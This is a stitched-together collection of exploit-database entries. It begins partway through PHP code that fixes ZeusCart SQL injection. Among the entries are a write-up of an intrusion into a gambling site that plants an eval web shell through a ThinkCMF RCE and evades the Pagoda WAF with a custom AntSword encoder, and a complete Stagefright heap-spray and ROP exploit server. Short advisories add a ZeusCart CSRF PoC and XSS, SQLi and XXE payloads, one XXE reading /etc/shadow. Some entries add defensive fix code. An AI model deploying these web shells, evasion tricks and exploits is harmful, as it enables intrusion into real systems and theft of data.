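    return new PDO('mysql:host=localhost;dbname=zeuscart;charset=utf8mb4', 'user', 'pass', [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepares
    ]);
}

function featured_subcategories(PDO $db, $rawMaincatid): array
{
    // CFeaturedItems.php concatenated $_GET['maincatid'] unquoted, so the
    // quote-stripping filter was irrelevant: "-1 AND IF(...)" is valid SQL
    // without a single quote. Validate the type, then bind the value.
    $maincatid = filter_var($rawMaincatid, FILTER_VALIDATE_INT);
    if ($maincatid === false) {
        return [];
    }
    $stmt = $db->prepare(
        "SELECT DISTINCT a.category_name AS Category, a.category_id AS maincatid,
                b.category_name AS SubCategory, b.category_id AS subcatid,
                b.category_image AS image
           FROM category_table a
     INNER JOIN category_table b ON a.category_id = b.category_parent_id
          WHERE b.category_parent_id = :maincatid AND b.category_status = 1"
    );
    $stmt->bindValue(':maincatid', $maincatid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function store_product_image(PDO $db, int $productId, array $upload, string $imgType): string
{
    // CProductEntry.php built its UPDATE/INSERT from $_FILES['ufile']['name'],
    // which never passed through the GET/POST filter. Here the client-supplied
    // name only selects an allow-listed extension; every stored path is
    // generated server side and bound as a parameter.
    $ext = strtolower(pathinfo($upload['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ['jpg', 'jpeg', 'png', 'gif'], true)) {
        throw new InvalidArgumentException('unsupported image type');
    }
    $name  = date('Y-m-d-His') . '-' . bin2hex(random_bytes(8)) . '.' . $ext;
    $image = 'images/products/' . $name;
    $thumb = 'images/products/thumbs/' . $name;
    $large = 'images/products/large/' . $name;

    if ($imgType === 'main') {
        $upd = $db->prepare(
            "UPDATE products_table
                SET image = :image, thumb_image = :thumb, large_image_path = :large
              WHERE product_id = :pid"
        );
        $upd->execute([':image' => $image, ':thumb' => $thumb, ':large' => $large, ':pid' => $productId]);
    }
    $ins = $db->prepare(
        "INSERT INTO product_images_table
                (product_id, image_path, thumb_image_path, type, large_image_path)
         VALUES (:pid, :image, :thumb, :type, :large)"
    );
    $ins->execute([':pid' => $productId, ':image' => $image, ':thumb' => $thumb,
                   ':type' => $imgType, ':large' => $large]);
    return $image;
}
```

With parameters bound this way, the BENCHMARK() payload from section 3 and the quoted file name from section 4 are both stored or compared as literal values rather than executed.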
-
Title: A record of penetrating a BC site while bypassing the Pagoda firewall

0x00 Information gathering

The main site sits behind a cloud WAF, so it gets blocked as soon as it is tested, and the preliminary tests found no usable hole, so I switched to a sub-site, hoping to obtain valuable information through it. This is a site for querying proxy accounts. Entering admin in the URL automatically redirects to the back end. Looking at this parameter, I guess it might be CMF.

0x01 getShell

ThinkCMF happens to have an RCE; you can try it:

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test1.php','<?php @eval($_POST[zero])?>')</php>

A white screen is a good sign; it should have succeeded. Visit it. Try connecting with AntSword and it reports an error right away; maybe I ran into a firewall. Then go back and have the shell try phpinfo manually. Sure enough, there is the Pagoda firewall.

0x02 Bypassing the Pagoda firewall

Since Pagoda must be filtering some functions, passing the payload directly is definitely impossible, so the traffic has to be obfuscated. Try sending every payload Base64-encoded. Because the payload arrives Base64-encoded, the small shell also has to be changed accordingly: it only needs to Base64-decode what is passed once. The small shell is as follows:

<?php @eval(base64_decode($_POST[zero]));

Encode phpinfo(); as Base64: cGhwaW5mbygpOw==

Send it. The Pagoda firewall no longer intercepts it; you can see that the Pagoda firewall has been bypassed successfully.

0x03 Modifying AntSword

Base64 encoding is being used, and AntSword actually ships with its own Base64 encoder and decoder. Try using the bundled Base64 encoder directly. Why is this happening?

Try analysing the traffic from AntSword. Set a proxy to Burp and intercept the traffic. You can see that there are clearly two places that a WAF recognises easily. The first is the keyword in the User-Agent header: Antsword/v2.1. This is equivalent to telling the WAF who I am, so it is the first point to change. Second, AntSword's traffic really does contain keywords; for example, after the cmd parameter there is eval and base64_decode everywhere. Since the small shell already has Base64 decoding built in, using the default encoder would not only fail to pass the WAF, it would not even connect to the small shell if there were no WAF, so I have to define an encoder myself. Create a new PHP encoder. Because the payload only needs to be Base64-encoded once, data['_'] can be Base64-processed directly; whether there are random parameters does not matter. The encoder is as follows:

'use strict';
/*
 * @param {string} pwd   connection password
 * @param {array}  data  payload array before encoder processing
 * @return {array} data  payload array after encoder processing
 */
module.exports = (pwd, data, ext = {}) => {
  data[pwd] = Buffer.from(data['_']).toString('base64');
  delete data['_'];
  return data;
}

Then change the UA header. Apply the encoder; the decoder does not need to be specified, the default is fine. I recommend choosing to add spam data and multipart packets. Test the connection again. Then click a directory and find that there is still a problem: directories cannot be traversed. This problem can actually be solved with Godzilla: upload a Godzilla shell. Someone will ask here, why not just upload the Godzilla shell directly? The actual situation is that the GET parameter submission has a length limit, and some symbols cause the PHP file to be truncated, so it cannot be uploaded as-is. There are quite a few websites, but it is a pity that there is no main site. The database contains a lot of proxy accounts. It is a waste of time.

0x03 Summary

1. When accessing the BC target's main site, there is no exploitable vulnerability. Accessing the sub-site and entering the admin directory redirects to the back end.
2. Through a CMS fingerprint query, the sub-site was found to be the ThinkCMF framework.
3. http://www.xxx.com/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test1.php','<?php @eval($_POST[zero])?>')</php>
4. Accessing the address http://www.xxx.com/test1.php shows a blank page.
5. Try connecting with AntSword; it reports an error right away. Executing a POST command, the Pagoda firewall intercepts it: http://www.xxx.com/test1.php POST: zero=phpinfo();
6. Here the RCE writes a one-line shell with Base64 decryption: http://www.xxx.com/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test2.php','<?php @eval(base64_decode($_POST[zero]));')</php>
7. Base64-encode phpinfo(); as cGhwaW5mbygpOw== and send http://www.xxx.com/test2.php POST: zero=cGhwaW5mbygpOw==
7. The Pagoda firewall intercepts AntSword's agent and the cmd parameter. The first is the keyword in the User-Agent header: Antsword/v2.1, which is equivalent to telling the WAF who I am; this is the first point to change. Second, AntSword's traffic still contains keywords; for example, after the cmd parameter there is eval and base64_decode everywhere, while our small shell already has Base64 decryption built in.
8. /** @param {string} pwd connection password * @param {array} data payload array before encoder processing * @return {array} data payload array after encoder processing */ module.exports = (pwd, data, ext = {}) => { data[pwd] = Buffer.from(data['_']).toString('base64'); delete data['_']; return data; }
9. In AntSword's request information, change the UA header (name: User-Agent, value:) to a normal HTTP request value. Click the directory; it still cannot be accessed.
12. Use the same method to load and modify Godzilla's default Base64 encoder. This bypasses the Pagoda firewall and allows normal access.

Original link: https://xz.aliyun.com/t/9295
-
ZeusCart 4.0 - Cross-Site Request Forgery
ZeusCart 4.0: CSRF
Security Advisory – Curesec Research Team

1. Introduction

Affected Product:    ZeusCart 4.0
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Contact:      support@zeuscart.com
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  08/13/2015
Disclosed to public: 09/14/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Vulnerability Description

None of the forms of Zeuscart have CSRF protection, which means that an attacker can perform actions for the victim if the victim visits an attacker-controlled site while logged in.

3. Proof of Concept

Change Admin Credentials:

<form name="myform" method="post" action="http://localhost/zeuscart-master/admin/?do=adminprofile&action=update" enctype="multipart/form-data">
    <input type="hidden" name="admin_name" value="admin2">
    <input type="hidden" name="admin_email" value="admin2@example.com">
    <input type="hidden" name="admin_password" value="admin">
</form>
<script>document.myform.submit();</script>

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

08/13/2015 Informed Vendor about Issue (no reply)
09/07/2015 Reminded Vendor of release date (no reply)
09/14/2015 Disclosed to public

6. Blog Reference

http://blog.curesec.com/article/blog/ZeusCart-40-CSRF-58.html
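What the missing protection looks like, as an added example that is not ZeusCart's code: a synchronizer token for the adminprofile update handler that the PoC form targets. The function names, session key and handler layout are assumptions for this example.

```php
<?php
// Added example (not ZeusCart code): synchronizer-token CSRF protection for
// admin/?do=adminprofile&action=update. Names and layout are assumptions.

const CSRF_SESSION_KEY = 'csrf_token';

function csrf_token(): string
{
    // One unguessable token per session, kept only server side; a page on
    // another origin cannot read it, so it cannot reproduce it in its form.
    if (empty($_SESSION[CSRF_SESSION_KEY])) {
        $_SESSION[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $_SESSION[CSRF_SESSION_KEY];
}

function csrf_field(): string
{
    // Rendered into every state-changing form in the admin area.
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

function csrf_check(array $post, array $server): bool
{
    // Constant-time comparison; a missing or wrong token rejects the request
    // before admin_name / admin_email / admin_password are even looked at.
    $expected = $_SESSION[CSRF_SESSION_KEY] ?? '';
    $given    = (string) ($post['csrf_token'] ?? '');
    if ($expected === '' || !hash_equals($expected, $given)) {
        return false;
    }
    // Defence in depth: a form auto-submitted from the attacker's page arrives
    // with the attacker's Origin (or Referer), not this site's host.
    $origin = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($origin === '') {
        return true;   // some clients omit both; the token already decided
    }
    return parse_url($origin, PHP_URL_HOST) === ($server['HTTP_HOST'] ?? null);
}

// Entry point for do=adminprofile&action=update.
function handle_admin_profile_update(array $post, array $server, callable $apply): array
{
    if (!csrf_check($post, $server)) {
        http_response_code(403);
        return ['status' => 'rejected', 'reason' => 'csrf'];
    }
    // $apply is the existing profile-update logic, run only after the check.
    $apply($post['admin_name'] ?? '', $post['admin_email'] ?? '', $post['admin_password'] ?? '');
    return ['status' => 'updated'];
}
```

Setting the session cookie with the SameSite attribute (session_set_cookie_params(['samesite' => 'Lax'])) adds a browser-side layer, but the token check is what makes the PoC form fail.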
-
Google Android - libstagefright Integer Overflow Remote Code Execution
#!/usr/bin/python2
import cherrypy
import os
import pwnlib.asm as asm
import pwnlib.elf as elf
import sys
import struct

with open('shellcode.bin', 'rb') as tmp:
    shellcode = tmp.read()

while len(shellcode) % 4 != 0:
    shellcode += '\x00'

# heap grooming configuration
alloc_size = 0x20
groom_count = 0x4
spray_size = 0x100000
spray_count = 0x10

# address of the buffer we allocate for our shellcode
mmap_address = 0x90000000

# addresses that we need to predict
libc_base = 0xb6ebd000
spray_address = 0xb3000000

# ROP gadget addresses
stack_pivot = None
pop_pc = None
pop_r0_r1_r2_r3_pc = None
pop_r4_r5_r6_r7_pc = None
ldr_lr_bx_lr = None
ldr_lr_bx_lr_stack_pad = 0
mmap64 = None
memcpy = None


def find_arm_gadget(e, gadget):
    gadget_bytes = asm.asm(gadget, arch='arm')
    gadget_address = None
    for address in e.search(gadget_bytes):
        if address % 4 == 0:
            gadget_address = address
            if gadget_bytes == e.read(gadget_address, len(gadget_bytes)):
                print asm.disasm(gadget_bytes, vma=gadget_address, arch='arm')
                break
    return gadget_address


def find_thumb_gadget(e, gadget):
    gadget_bytes = asm.asm(gadget, arch='thumb')
    gadget_address = None
    for address in e.search(gadget_bytes):
        if address % 2 == 0:
            gadget_address = address + 1
            if gadget_bytes == e.read(gadget_address - 1, len(gadget_bytes)):
                print asm.disasm(gadget_bytes, vma=gadget_address-1, arch='thumb')
                break
    return gadget_address


def find_gadget(e, gadget):
    gadget_address = find_thumb_gadget(e, gadget)
    if gadget_address is not None:
        return gadget_address
    return find_arm_gadget(e, gadget)


def find_rop_gadgets(path):
    global memcpy
    global mmap64
    global stack_pivot
    global pop_pc
    global pop_r0_r1_r2_r3_pc
    global pop_r4_r5_r6_r7_pc
    global ldr_lr_bx_lr
    global ldr_lr_bx_lr_stack_pad

    e = elf.ELF(path)
    e.address = libc_base

    memcpy = e.symbols['memcpy']
    print '[*] memcpy : 0x{:08x}'.format(memcpy)

    mmap64 = e.symbols['mmap64']
    print '[*] mmap64 : 0x{:08x}'.format(mmap64)

    # .text:00013344 ADD R2, R0, #0x4C
    # .text:00013348 LDMIA R2, {R4-LR}
    # .text:0001334C TEQ SP, #0
    # .text:00013350 TEQNE LR, #0
    # .text:00013354 BEQ botch_0
    # .text:00013358 MOV R0, R1
    # .text:0001335C TEQ R0, #0
    # .text:00013360 MOVEQ R0, #1
    # .text:00013364 BX LR
    pivot_asm = ''
    pivot_asm += 'add r2, r0, #0x4c\n'
    pivot_asm += 'ldmia r2, {r4 - lr}\n'
    pivot_asm += 'teq sp, #0\n'
    pivot_asm += 'teqne lr, #0'
    stack_pivot = find_arm_gadget(e, pivot_asm)
    print '[*] stack_pivot : 0x{:08x}'.format(stack_pivot)

    pop_pc_asm = 'pop {pc}'
    pop_pc = find_gadget(e, pop_pc_asm)
    print '[*] pop_pc : 0x{:08x}'.format(pop_pc)

    pop_r0_r1_r2_r3_pc = find_gadget(e, 'pop {r0, r1, r2, r3, pc}')
    print '[*] pop_r0_r1_r2_r3_pc : 0x{:08x}'.format(pop_r0_r1_r2_r3_pc)

    pop_r4_r5_r6_r7_pc = find_gadget(e, 'pop {r4, r5, r6, r7, pc}')
    print '[*] pop_r4_r5_r6_r7_pc : 0x{:08x}'.format(pop_r4_r5_r6_r7_pc)

    ldr_lr_bx_lr_stack_pad = 0
    for i in range(0, 0x100, 4):
        ldr_lr_bx_lr_asm = 'ldr lr, [sp, #0x{:08x}]\n'.format(i)
        ldr_lr_bx_lr_asm += 'add sp, sp, #0x{:08x}\n'.format(i + 8)
        ldr_lr_bx_lr_asm += 'bx lr'
        ldr_lr_bx_lr = find_gadget(e, ldr_lr_bx_lr_asm)
        if ldr_lr_bx_lr is not None:
            ldr_lr_bx_lr_stack_pad = i
            break


def pad(size):
    return '#' * size


def pb32(val):
    return struct.pack(">I", val)


def pb64(val):
    return struct.pack(">Q", val)


def p32(val):
    return struct.pack("<I", val)


def p64(val):
    return struct.pack("<Q", val)


def chunk(tag, data, length=0):
    if length == 0:
        length = len(data) + 8
    if length > 0xffffffff:
        return pb32(1) + tag + pb64(length) + data
    return pb32(length) + tag + data


def alloc_avcc(size):
    avcc = 'A' * size
    return chunk('avcC', avcc)


def alloc_hvcc(size):
    hvcc = 'H' * size
    return chunk('hvcC', hvcc)


def sample_table(data):
    stbl = ''
    stbl += chunk('stco', '\x00' * 8)
    stbl += chunk('stsc', '\x00' * 8)
    stbl += chunk('stsz', '\x00' * 12)
    stbl += chunk('stts', '\x00' * 8)
    stbl += data
    return chunk('stbl', stbl)


def memory_leak(size):
    pssh = 'leak'
    pssh += 'L' * 16
    pssh += pb32(size)
    pssh += 'L' * size
    return chunk('pssh', pssh)


def heap_spray(size):
    pssh = 'spry'
    pssh += 'S' * 16
    pssh += pb32(size)

    page = ''
    nop = asm.asm('nop', arch='thumb')
    while len(page) < 0x100:
        page += nop
    page += shellcode
    while len(page) < 0xed0:
        page += '\xcc'

    # MPEG4DataSource fake vtable
    page += p32(stack_pivot)            # pivot swaps stack then returns to pop {pc}
    page += p32(pop_r0_r1_r2_r3_pc)

    # mmap64(mmap_address,
    #        0x1000,
    #        PROT_READ | PROT_WRITE | PROT_EXECUTE,
    #        MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS,
    #        -1,
    #        0);
    page += p32(mmap_address)           # r0 = address
    page += p32(0x1000)                 # r1 = size
    page += p32(7)                      # r2 = protection
    page += p32(0x32)                   # r3 = flags
    page += p32(ldr_lr_bx_lr)           # pc
    page += pad(ldr_lr_bx_lr_stack_pad)
    page += p32(pop_r4_r5_r6_r7_pc)     # lr
    page += pad(4)
    page += p32(0x44444444)             # r4
    page += p32(0x55555555)             # r5
    page += p32(0x66666666)             # r6
    page += p32(0x77777777)             # r7
    page += p32(mmap64)                 # pc
    page += p32(0xffffffff)             # fd (and then r4)
    page += pad(4)                      # padding (and then r5)
    page += p64(0)                      # offset (and then r6, r7)
    page += p32(pop_r0_r1_r2_r3_pc)     # pc

    # memcpy(shellcode_address,
    #        spray_address + len(rop_stack),
    #        len(shellcode));
    page += p32(mmap_address)           # r0 = dst
    page += p32(spray_address - 0xed0)  # r1 = src
    page += p32(0xed0)                  # r2 = size
    page += p32(0x33333333)             # r3
    page += p32(ldr_lr_bx_lr)           # pc
    page += pad(ldr_lr_bx_lr_stack_pad)
    page += p32(pop_r4_r5_r6_r7_pc)     # lr
    page += pad(4)
    page += p32(0x44444444)             # r4
    page += p32(0x55555555)             # r5
    page += p32(0x66666666)             # r6
    page += p32(0x77777777)             # r7
    page += p32(memcpy)                 # pc
    page += p32(0x44444444)             # r4
    page += p32(0x55555555)             # r5
    page += p32(0x66666666)             # r6
    page += p32(0x77777777)             # r7
    page += p32(mmap_address + 1)       # pc

    while len(page) < 0x1000:
        page += '#'

    pssh += page * (size // 0x1000)
    return chunk('pssh', pssh)


def exploit_mp4():
    ftyp = chunk("ftyp", "69736f6d0000000169736f6d".decode("hex"))

    trak = ''

    # heap spray so we have somewhere to land our corrupted vtable
    # pointer
    # yes, we wrap this in a sample_table for a reason; the
    # NuCachedSource we will be using otherwise triggers calls to mmap,
    # leaving our large allocations non-contiguous and making our chance
    # of failure pretty high. wrapping in a sample_table means that we
    # wrap the NuCachedSource with an MPEG4Source, making a single
    # allocation that caches all the data, doubling our heap spray
    # effectiveness :-)
    trak += sample_table(heap_spray(spray_size) * spray_count)

    # heap groom for our MPEG4DataSource corruption
    # get the default size allocations for our MetaData::typed_data
    # groom allocations out of the way first, by allocating small blocks
    # instead.
    trak += alloc_avcc(8)
    trak += alloc_hvcc(8)

    # we allocate the initial tx3g chunk here; we'll use the integer
    # overflow so that the allocated buffer later is smaller than the
    # original size of this chunk, then overflow all of the following
    # MPEG4DataSource object and the following pssh allocation; hence why
    # we will need the extra groom allocation (so we don't overwrite
    # anything sensitive...)

    # | tx3g | MPEG4DataSource | pssh |
    overflow = 'A' * 24
    # | tx3g ----------------> | pssh |
    overflow += p32(spray_address)          # MPEG4DataSource vtable ptr
    overflow += '0' * 0x48
    overflow += '0000'                      # r4
    overflow += '0000'                      # r5
    overflow += '0000'                      # r6
    overflow += '0000'                      # r7
    overflow += '0000'                      # r8
    overflow += '0000'                      # r9
    overflow += '0000'                      # r10
    overflow += '0000'                      # r11
    overflow += '0000'                      # r12
    overflow += p32(spray_address + 0x20)   # sp
    overflow += p32(pop_pc)                 # lr
    trak += chunk("tx3g", overflow)

    # defragment the for alloc_size blocks, then make our two
    # allocations. we end up with a spurious block in the middle, from
    # the temporary ABuffer deallocation.

    # | pssh | - | pssh |
    trak += memory_leak(alloc_size) * groom_count
    # | pssh | - | pssh | .... | avcC |
    trak += alloc_avcc(alloc_size)
    # | pssh | - | pssh | .... | avcC | hvcC |
    trak += alloc_hvcc(alloc_size)
    # | pssh | - | pssh | pssh | avcC | hvcC | pssh |
    trak += memory_leak(alloc_size) * 8
    # | pssh | - | pssh | pssh | avcC | .... |
    trak += alloc_hvcc(alloc_size * 2)

    # entering the stbl chunk triggers allocation of an MPEG4DataSource
    # object
    # | pssh | - | pssh | pssh | avcC | MPEG4DataSource | pssh |
    stbl = ''
    # | pssh | - | pssh | pssh | .... | MPEG4DataSource | pssh |
    stbl += alloc_avcc(alloc_size * 2)
    # | pssh | - | pssh | pssh | tx3g | MPEG4DataSource | pssh |
    # | pssh | - | pssh | pssh | tx3g ----------------> |
    overflow_length = (-(len(overflow) - 24) & 0xffffffffffffffff)
    stbl += chunk("tx3g", '', length=overflow_length)
    trak += chunk('stbl', stbl)

    return ftyp + chunk('trak', trak)


index_page = '''
<!DOCTYPE html>
<html>
<head>
<title>Stagefrightened!</title>
</head>
<body>
<script>
window.setTimeout('location.reload(true);', 4000);
</script>
<iframe src='/exploit.mp4'></iframe>
</body>
</html>
'''


class ExploitServer(object):
    exploit_file = None
    exploit_count = 0

    @cherrypy.expose
    def index(self):
        self.exploit_count += 1
        print '*' * 80
        print 'exploit attempt: ' + str(self.exploit_count)
        print '*' * 80
        return index_page

    @cherrypy.expose(["exploit.mp4"])
    def exploit(self):
        cherrypy.response.headers['Content-Type'] = 'video/mp4'
        cherrypy.response.headers['Content-Encoding'] = 'gzip'
        if self.exploit_file is None:
            exploit_uncompressed = exploit_mp4()
            with open('exploit_uncompressed.mp4', 'wb') as tmp:
                tmp.write(exploit_uncompressed)
            os.system('gzip exploit_uncompressed.mp4')
            with open('exploit_uncompressed.mp4.gz', 'rb') as tmp:
                self.exploit_file = tmp.read()
            os.system('rm exploit_uncompressed.mp4.gz')
        return self.exploit_file


def main():
    find_rop_gadgets('libc.so')
    with open('exploit.mp4', 'wb') as tmp:
        tmp.write(exploit_mp4())
    cherrypy.quickstart(ExploitServer())


if __name__ == '__main__':
    main()
-
Microsoft Lync 2010 4.0.7577.0 - User-Agent Header Handling Arbitrary Command Execution
source: https://www.securityfocus.com/bid/57300/info

Microsoft Lync is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to perform unauthorized actions on behalf of the victim.

GET /JW926520 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)";var oShell = new ActiveXObject("Shell.Application");var commandtoRun = "C:\\Windows\\notepad.exe";oShell.ShellExecute(commandtoRun,"","","open","1");-"
Host: meet.domainname.com
Connection: Keep-Alive
Cookie: LOCO=yes; icscontext=cnet; ProfileNameCookie=example
-
phpLiteAdmin - 'table' SQL Injection
source: https://www.securityfocus.com/bid/57431/info phpLiteAdmin is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. phpLiteAdmin 1.8.x and 1.9.x are vulnerable. http://www.example.com/phpliteadmin.php?action=row_view&table=' [ SQLi ]
-
IP.Gallery - 'img' SQL Injection
source: https://www.securityfocus.com/bid/57444/info IP.Gallery is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. IP.Gallery 2.0.5 is vulnerable; other versions may also be affected. http://www.example.com/index.php?automodule=gallery&cmd=si&img=[SQL]
-
Apache OFBiz 10.4.x - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/57463/info

Apache OFBiz is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Apache OFBiz versions prior to 10.04.05 and 11.04.02 are vulnerable.

GET /exampleext/control/ManagePortalPages?parentPortalPageId=EXAMPLE"><script>alert("xss")</script> HTTP/1.1
Host: www.example.com:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
Connection: keep-alive
Referer: https://www.example.com:8443/exampleext/control/main?externalLoginKey=EL367731470037
Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1; OFBiz.Visitor=10002
-
Scripts Genie Classified Ultra - SQL Injection / Cross-Site Scripting
source: https://www.securityfocus.com/bid/57465/info Classified Ultra is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. SQL-injection: http://www.example.com/demos/classifiedultra/subclass.php?c=16'[SQLi HERE] Cross-site scripting: http://www.example.com/demos/classifiedultra/subclass.php?c=6&cname=Credit%20Cards[XSS HERE]
-
F5 Networks BIG-IP - XML External Entity Injection
source: https://www.securityfocus.com/bid/57496/info

F5 Networks BIG-IP is prone to an XML External Entity injection vulnerability. Attackers can exploit this issue to obtain potentially sensitive information from local files on computers running the vulnerable application and to carry out other attacks.

POST /sam/admin/vpe2/public/php/server.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 143

<?xml version="1.0" encoding='utf-8' ?>
<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>
<message><dialogueType>&e;</dialogueType></message>

The response includes the content of the file:

<?xml version="1.0" encoding="utf-8"?>
<message><dialogueType>any</dialogueType><status>generalError</status><command>any</command><accessPolicyName>any</accessPolicyName><messageBody><generalErrorText>Client has sent unknown dialogueType '
root:--hash--:15490::::::
bin:*:15490::::::
daemon:*:15490::::::
adm:*:15490::::::
lp:*:15490::::::
mail:*:15490::::::
uucp:*:15490::::::
operator:*:15490::::::
nobody:*:15490::::::
tmshnobody:*:15490::::::
admin:--hash--:15490:0:99999:7:::
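The two halves of this bug in one place, as an added example that is not F5's code: the parsing pattern that resolves the SYSTEM entity and echoes it back, beside a hardened parser for the same <message> document that refuses a DOCTYPE and never reflects an unknown dialogueType. Function names, the sample documents and the list of known dialogue types are constructed for this example.

```php
<?php
// Added example (not F5 code): vulnerable vs. hardened handling of the
// <message><dialogueType> document posted to server.php. Names and samples
// are constructed.

function dialogue_type_unsafe(string $xml): ?string
{
    // Entity substitution enabled (LIBXML_NOENT): a DOCTYPE with a SYSTEM
    // entity is resolved, and its expansion becomes the dialogueType text,
    // which the advisory's server then echoes inside generalErrorText.
    $dom = new DOMDocument();
    $dom->loadXML($xml, LIBXML_NOENT);
    $node = $dom->getElementsByTagName('dialogueType')->item(0);
    return $node ? $node->textContent : null;
}

function dialogue_type_safe(string $xml): string
{
    // 1. The protocol never needs a DTD, so reject any DOCTYPE before the
    //    parser gets a chance to act on it.
    if (preg_match('/<!DOCTYPE/i', $xml)) {
        throw new InvalidArgumentException('DOCTYPE not allowed');
    }
    // 2. Parse with no entity substitution and no network access, and
    //    double-check that no doctype node slipped through.
    $prev = libxml_use_internal_errors(true);
    $dom  = new DOMDocument();
    $ok   = $dom->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    if (!$ok || $dom->doctype !== null) {
        throw new InvalidArgumentException('malformed XML');
    }
    $node  = $dom->getElementsByTagName('dialogueType')->item(0);
    $value = $node ? trim($node->textContent) : '';
    // 3. Accept only values from a closed set, and report the failure
    //    without reflecting the client's text back into the response.
    $known = ['ping', 'getPolicy'];   // constructed list, not F5's real set
    if (!in_array($value, $known, true)) {
        throw new InvalidArgumentException('unknown dialogueType');
    }
    return $value;
}

// Constructed sample input: a benign request and one carrying a DOCTYPE
// (internal entity only, so the sample itself reads no files).
$benign  = '<?xml version="1.0"?><message><dialogueType>ping</dialogueType></message>';
$withDtd = '<?xml version="1.0"?><!DOCTYPE a [<!ENTITY e "x">]>'
         . '<message><dialogueType>&e;</dialogueType></message>';

echo dialogue_type_safe($benign), "\n";
try {
    dialogue_type_safe($withDtd);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

On PHP versions before 8.0, libxml_disable_entity_loader(true) should also be called at startup; on 8.0 and later external entity loading is off unless a parser option turns it back on.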